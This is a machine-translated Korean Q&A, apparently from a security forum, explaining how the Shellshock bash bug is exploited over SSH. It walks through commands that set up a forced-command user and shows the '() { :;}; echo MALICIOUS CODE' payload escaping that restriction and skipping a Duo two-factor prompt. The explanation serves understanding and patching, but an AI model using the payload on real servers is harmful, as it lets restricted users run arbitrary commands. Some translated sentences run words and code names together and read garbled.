SSH를 통해 어떻게 쉘 쇼크를 이용할 수 있습니까?

분명히 쉘 쇼크 Bash 익스플로잇 CVE-2014-6271 은 SSH를 통해 네트워크를 통해 익스플로잇 될 수 있습니다. 익스플로잇이 Apache / CGI를 통해 어떻게 작동하는지 상상할 수 있지만 SSH를 통해 어떻게 작동하는지 상상할 수 없습니까?

누군가 SSH를 어떻게 이용하고 시스템에 어떤 해를 끼칠 수 있는지 예를 들어 줄 수 있습니까?

설명

AFAIU에서는 인증 된 사용자 만 SSH를 통해이 취약점을 악용 할 수 있습니다. 어쨌든 시스템에 합법적으로 액세스 할 수있는 사람에게는이 취약점이 어떤 용도로 사용됩니까? 내 말은,이 익스플로잇에는 권한 에스컬레이션이 없으므로 (루트가 될 수 없음) SSH를 통해 합법적으로 로그인 한 후 할 수있는 것 이상을 수행 할 수 없습니다.

이를 악용 할 수있는 한 가지 예는 authorized_keys강제 명령 이있는 서버입니다 . 에 항목을 추가 할 때 ssh 공개 키가 사용될 때마다 강제 로 실행되도록 ~/.ssh/authorized_keys행 접두어를 지정할 수 있습니다 . 이 익스플로잇을 사용하면 대상 사용자의 쉘이로 설정된 경우 익스플로잇을 이용하여 명령이 아닌 다른 항목을 실행할 수 있습니다.command="foo"foobash

이것은 아마도 예에서 더 의미가있을 것이므로 여기에 예가 있습니다.

sudo useradd -d /testuser -s /bin/bash testuser
sudo mkdir -p /testuser/.ssh
sudo sh -c "echo command=\\\"echo starting sleep; sleep 1\\\" $(cat ~/.ssh/id_rsa.pub) > /testuser/.ssh/authorized_keys"
sudo chown -R testuser /testuser

여기서 testuserssh 키를 사용하는 ssh 연결을 강제로 실행 하는 사용자를 설정합니다 echo starting sleep; sleep 1.

우리는 이것을 테스트 할 수 있습니다 :

$ ssh testuser@localhost echo something else
starting sleep

우리 echo something else가 어떻게 실행되지는 않지만 starting sleep강제 명령이 실행되었음을 보여줍니다.

이제이 익스플로잇이 어떻게 사용되는지 보여 드리겠습니다 :

$ ssh testuser@localhost '() { :;}; echo MALICIOUS CODE'
MALICIOUS CODE
starting sleep

이것은 환경 변수를 전달 된 명령으로 sshd설정 하기 때문에 작동 합니다 SSH_ORIGINAL_COMMAND. 그래서 비록 sshd실행 sleep, 그리고 명령을 내 코드는 여전히 실행됩니다 때문에 악용의,에 말했다.

Ramesh의 예제에서 확장-2 단계 인증을 사용하는 경우 구현 방식에 따라이 익스플로잇을 사용하여 두 번째 요소를 무시할 수 있습니다.

— 일반 로그인 —

[10:30:51]$ ssh -p 2102 localhost
password:
Duo two-factor login

Enter a passcode or select one of the following options:

 1. Duo Push to XXX-XXX-XXXX
 2. Phone call to XXX-XXX-XXXX
 3. SMS passcodes to XXX-XXX-XXXX (next code starts with: 2)

Passcode or option (1-3): 1

Pushed a login request to your device...
Success. Logging you in...
[server01 ~]$ logout

— 2FA없이 실행 코드 —

[10:31:24]$ ssh -p 2102 localhost '() { :;}; echo MALICIOUS CODE'
password:
MALICIOUS CODE

2FA를 묻지 않고 코드를 실행했음을 알 수 있습니다.

— bash 패치 후 —

[10:39:10]$ ssh -p 2102 localhost '() { :;}; echo MALICIOUS CODE'
password:
bash: warning: SSH_ORIGINAL_COMMAND: ignoring function definition attempt
bash: error importing function definition for `SSH_ORIGINAL_COMMAND’

Shellshock은 SSH가 아닌 bash의 취약점입니다. 이를 악용하려면 공격자는 취약한 시스템에서 bash를 실행하고 bash에 전달 될 환경 변수의 값을 제어해야합니다.

SSH를 통해 bash 프로세스에 도달하려면 공격자가 인증 단계를 통과해야합니다. (다른 네트워크 서비스를 통해 공격 벡터가있을 수 있지만이 스레드의 범위를 벗어납니다.) 어쨌든 계정이 임의의 쉘 명령을 실행할 수 있으면 공격이 없습니다. 계정이 SFTP 전용 계정 또는 git 전용 계정과 같은 특정 명령을 실행하도록 계정이 제한되면 취약점이 발생합니다.

와 : SSH와 특정 명령을 실행하려면 계정을 제한하는 방법에는 여러 가지가 있습니다 ForceCommand에 옵션 sshd_config또는 함께 command=. authorized_keys파일 제한 . 사용자의 셸이 bash 인 경우 Shellshock 취약점을 통해 일반적으로 제한된 계정에만 액세스 할 수있는 사용자는 제한을 무시하고 임의의 명령을 실행할 수 있습니다.